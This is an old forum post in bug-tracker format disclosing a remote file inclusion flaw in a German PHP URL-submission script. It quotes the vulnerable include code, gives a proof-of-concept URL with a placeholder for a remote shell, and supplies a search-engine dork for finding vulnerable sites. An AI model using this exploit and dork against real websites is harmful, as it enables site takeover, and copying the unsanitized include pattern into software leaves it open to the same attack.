Guest BanKai Posted January 14, 2008 Report Share Posted January 14, 2008 [RST BugTrack]Script Name:Quit Submit URL Submit and Spider Robot(due to the whole software and titles being in german I do not guarantee this is the software's real name ... shit I gotta learn german)Bug Type:Remote File InclusionBug In:index.phpVulnerable Code:$seite = $_REQUEST['seite'];[...]<? include "$seite";?>Proof Of Concept:http://www.website.com/index.php?seite=[SHELL HERE]Dork:inurl:"index.php?seite=webkatalog"[/RST BugTrack] Quote Link to comment Share on other sites More sharing options...